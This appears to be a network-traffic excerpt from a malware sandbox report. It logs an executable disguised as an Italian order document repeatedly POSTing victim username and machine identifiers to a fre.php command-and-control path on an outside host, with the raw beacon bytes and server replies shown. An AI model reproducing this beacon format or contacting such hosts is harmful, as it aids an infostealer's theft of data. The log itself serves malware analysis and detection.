Nov 25, 2021 10:54:43.023086071 CET	7391	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:43.056854010 CET	7391	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:43.108867884 CET	7392	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
781	192.168.11.20	50629	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:43.528949976 CET	7393	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:43.563225985 CET	7393	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:43.612893105 CET	7393	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
782	192.168.11.20	50630	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:43.982400894 CET	7394	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:44.015687943 CET	7394	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:44.064980984 CET	7394	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
783	192.168.11.20	50631	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:44.482332945 CET	7395	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:44.516541958 CET	7395	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:44.571494102 CET	7396	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
784	192.168.11.20	50632	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:44.983290911 CET	7396	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:45.017497063 CET	7397	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:45.067610979 CET	7397	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
785	192.168.11.20	50633	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:45.439632893 CET	7398	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:45.473598003 CET	7398	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:45.530987024 CET	7398	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
786	192.168.11.20	50634	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:45.952049017 CET	7399	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:45.986447096 CET	7399	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:46.036932945 CET	7400	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
787	192.168.11.20	50635	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:46.455302000 CET	7400	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:46.488739967 CET	7401	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:46.537779093 CET	7401	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
788	192.168.11.20	50636	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:46.977530956 CET	7402	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:47.012042046 CET	7402	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:47.062096119 CET	7402	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
789	192.168.11.20	50637	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:47.479979038 CET	7403	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:47.514127016 CET	7403	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:47.563481092 CET	7404	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.11.20	49916	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:50.496916056 CET	6425	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:50.530992031 CET	6425	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:50.589412928 CET	6425	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
790	192.168.11.20	50638	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:47.949234962 CET	7404	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:47.982718945 CET	7405	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:48.034163952 CET	7405	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
791	192.168.11.20	50639	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:48.460000038 CET	7406	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:48.494208097 CET	7406	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:48.546823025 CET	7406	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
792	192.168.11.20	50640	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:48.980263948 CET	7407	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:49.013894081 CET	7407	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:49.063332081 CET	7408	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
793	192.168.11.20	50641	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:49.491342068 CET	7408	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:49.525903940 CET	7409	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:49.577491999 CET	7409	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
794	192.168.11.20	50642	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:50.009141922 CET	7410	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:50.042721033 CET	7410	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:50.098364115 CET	7410	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
795	192.168.11.20	50643	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:50.524008989 CET	7411	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:50.557706118 CET	7411	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:50.607568979 CET	7412	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
796	192.168.11.20	50644	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:51.017242908 CET	7412	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:51.051208973 CET	7413	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:51.101434946 CET	7413	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
797	192.168.11.20	50645	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:51.521089077 CET	7414	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:51.554606915 CET	7414	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:51.605211973 CET	7414	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
798	192.168.11.20	50646	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:51.987313986 CET	7415	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:52.021644115 CET	7415	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:52.133135080 CET	7416	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
799	192.168.11.20	50647	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:52.546072006 CET	7416	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:52.580209017 CET	7417	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
